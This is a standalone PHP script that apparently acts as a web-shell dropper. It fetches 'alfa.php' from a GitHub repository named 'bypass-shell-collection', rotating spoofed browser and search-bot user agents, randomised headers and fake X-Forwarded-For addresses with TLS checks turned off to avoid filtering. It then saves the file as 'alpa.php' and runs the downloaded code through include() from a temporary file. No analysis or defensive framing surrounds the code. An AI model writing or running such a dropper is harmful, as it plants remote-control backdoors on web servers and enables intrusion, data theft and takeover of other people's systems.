<?php
$url="https://raw.githubusercontent.com/shootcannon/bypass-shell-collection/refs/heads/main/alfa.php";
$user_agents=array('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15','curl/7.68.0','Wget/1.20.3','python-requests/2.28.1','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)');
$headers=array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language: en-US,en;q=0.5','Accept-Encoding: gzip, deflate, br','Connection: keep-alive','Upgrade-Insecure-Requests: 1','Cache-Control: max-age=0','Referer: https://www.google.com/','DNT: 1','Sec-Fetch-Dest: document','Sec-Fetch-Mode: navigate','Sec-Fetch-Site: none','Sec-Fetch-User: ?1');
function download_with_curl($url,$user_agent,$headers){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$url);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($ch,CURLOPT_TIMEOUT,60);curl_setopt($ch,CURLOPT_USERAGENT,$user_agent);curl_setopt($ch,CURLOPT_HTTPHEADER,$headers);curl_setopt($ch,CURLOPT_HEADER,1);curl_setopt($ch,CURLOPT_NOBODY,0);curl_setopt($ch,CURLOPT_MAXREDIRS,10);curl_setopt($ch,CURLOPT_ENCODING,'');curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID='.md5(uniqid()));curl_setopt($ch,CURLOPT_REFERER,'https://www.google.com/search?q='.urlencode($url));$response=curl_exec($ch);$info=curl_getinfo($ch);$error=curl_error($ch);curl_close($ch);return array('response'=>$response,'info'=>$info,'error'=>$error);}
$success=false;$downloaded='';
foreach($user_agents as $ua){$random_headers=array();foreach($headers as $h){if(rand(0,10)>3){$random_headers[]=$h;}}$random_headers[]='X-Forwarded-For: '.rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);$result=download_with_curl($url,$ua,$random_headers);if($result['info']['http_code']==200&&!empty($result['response'])){$parts=explode("\r\n\r\n",$result['response'],2);if(count($parts)==2){$downloaded=$parts[1];}else{$downloaded=$result['response'];}if(strpos($downloaded,'<?php')!==false){$success=true;echo "[+] Success with User-Agent: ".$ua."\n";break;}}}
if(!$success){echo "[!] All curl attempts failed, trying stream_context...\n";$options=array('http'=>array('method'=>'GET','header'=>"User-Agent: ".$user_agents[array_rand($user_agents)]."\r\n"."Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"."Accept-Language: en-US,en;q=0.5\r\n"."Referer: https://www.google.com/\r\n"."Connection: close\r\n",'timeout'=>60,'follow_location'=>1,'max_redirects'=>10,'ignore_errors'=>true),'ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false));$context=stream_context_create($options);$downloaded=@file_get_contents($url,false,$context);if($downloaded!==false&&strpos($downloaded,'<?php')!==false){$success=true;echo "[+] Success with stream_context\n";}}
if($success&&!empty($downloaded)){$filename='alpa.php';if(file_put_contents($filename,$downloaded)){echo "[+] File downloaded: ".$filename." (".strlen($downloaded)." bytes)\n";if(strpos($downloaded,'<?php')!==false){$tmp=tempnam(sys_get_temp_dir(),'p');file_put_contents($tmp,$downloaded);include($tmp);unlink($tmp);}}else{echo "[-] Failed to save file\n";}}else{echo "[-] Download failed\n";}
?>
